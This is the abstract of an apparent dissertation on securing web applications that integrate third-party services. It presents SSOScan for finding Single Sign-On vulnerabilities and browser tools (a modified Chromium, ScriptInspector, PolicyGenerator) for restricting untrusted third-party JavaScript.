Abstract
Modern applications integrate third-party services for easier development, additional functionality (e.g., connecting with social network identities), and extra revenue (e.g., advertising networks). This integration, however, presents risks to application integrity and user privacy. This research addresses integrated applications that incorporate two types of third-party services: (1) services from trusted providers that provide security-critical functionalities to an application such as Single Sign-On (SSO), and (2) services from untrusted providers that incorporate other services such as analytics and advertisements. Unlike traditional library inclusions, integrated applications present new challenges due to the opaqueness of third-party back end services and platform runtimes.
For the first type of integration, we assume a benign service provider and our goal is to eliminate misunderstandings between the service provider and the application developer that may lead to security vulnerabilities in the implementation. We advocate for a systematic approach to discover implicit assumptions that uses an iterative process to refine system models and uncover needed assumptions. To better understand the prevalence of discovered vulnerabilities at large scale, we developed an automated vulnerability scanner, SSOScan, that can be deployed in an application marketplace or as a stand-alone service. This testing framework can drive the application automatically and check if a given application is vulnerable by carrying out simulated attacks and monitoring application traffic and behavior, and we have used it to automatically find serious vulnerabilities in hundreds of websites.
For the second type of integration, the embedding application does not rely on a third-party service for security-critical functionality, but wants to prevent harm to the application and its users from embedded services that may be malicious. Integrated services often execute as the same principal as the host application code, with full access to application and user data. To mitigate the potential risks of integrating untrusted code, our approach aims to prevent third-party services from exfiltrating sensitive data or maliciously tampering with the host content. To this end, we first developed a modified Chromium browser that supports fine-grained DOM access control, as well as JavaScript execution context isolation. We built an automatic policy generator that identifies private information by comparing duplicate requests. To reduce false positives and further improve site administrator's understanding of third-party JavaScript behavior, we built ScriptInspector, a modification of Firefox that mediates, records, and visualizes critical resource accesses. ScriptInspector can be used to compare runtime accesses with existing policies and report violations to site administrators. To facilitate policy creation, the PolicyGenerator extension proposes permission candidates for site administrators to inspect, edit, and approve.
The nature of modern web application development presents major challenges for security. Although developers are prone to make mistakes when integrating third-party components, the systematic analysis approach, automatic scanners, and developer tools we present can significantly increase a developer's confidence in the security and privacy of integrated applications.
